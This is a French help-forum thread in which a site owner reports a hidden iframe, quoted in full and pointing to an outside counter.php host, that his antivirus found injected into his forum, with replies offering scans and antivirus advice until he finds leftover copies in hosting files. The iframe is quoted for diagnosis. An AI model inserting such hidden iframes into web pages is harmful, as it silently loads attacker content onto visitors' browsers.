Faux Positif

Bonjour

Bitedefender m'a trouvé ça

</HTML><iframe src="http://www.slovac.com/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/>

sur mon forum forum-blogs.com

j'ai supprimé les nombreuses iframes louches.

j'ai supprimé un trojan sur mon pc,

est ce qu'un ****** php peut créer cette iframe sur mon forum, pour le moment je n'ai rien trouvé d'anormal,

cordialement

jeremie

Réponses

• Bonjour

Bitedefender m'a trouvé ça

sur mon forum forum-blogs.com

j'ai supprimé les nombreuses iframes louches.

j'ai supprimé un trojan sur mon pc,

est ce qu'un ****** php peut créer cette iframe sur mon forum, pour le moment je n'ai rien trouvé d'anormal,

cordialement

jeremie

bonjour jeremie,

voiçi le resultat virustotal:

https://www.virustotal.com/fr/url/9abbbf8fd0659fbb4f63b663bfb26b7dd956b235fbfcbb7be3ad454e78c5a4d3/analysis/1368114334/

as tu scanner un scan systeme?

bonne fin d'aprem.

• oui avec bitedefender et malwarebyte

• oui avec bitedefender et malwarebyte

bonsoir jeremie,

attention avec malwarebyte!!!!

avec Malwarebytes, il peut y avoir un conflit avec Bitdefender. Si vous n'avez pas la version avec auto-protection, il faudra faire attention lorsque vous lancerez une anlayse avec. Si vous avez la version avec protection résident, il faut le désinstaller.

a tu d'autre protection antivirus,antispywares,antimalwares,.....?

est ce que windows est a jour.

si c'est le cas desinstalle-les.

desactive le pare feu windows si tu dispose deja du pare feu bitdefender,desactive windows defender.

desinstalle le controle parental windows live ainsi que tous logiciel d'optimisation genre tuneup,.....

bonne soiree.

• Bonjour jeremie,

Si vous avez Malwaresbytes, désinstallez le.

Si la détection se reproduit, indiquez-moi précisément à quelle adresse de votre site la fausse détection intervient.

Cordialement,

Yann

• problème résolu : il restait quelques iframes dans des dossiers contenant de la documentation sous la forme de fichiers html fournie par mon hébergeur.

merci pour les réponses rapides.

• Bonjour jeremie,

Ok c'est noté.

Cordialement,

Yann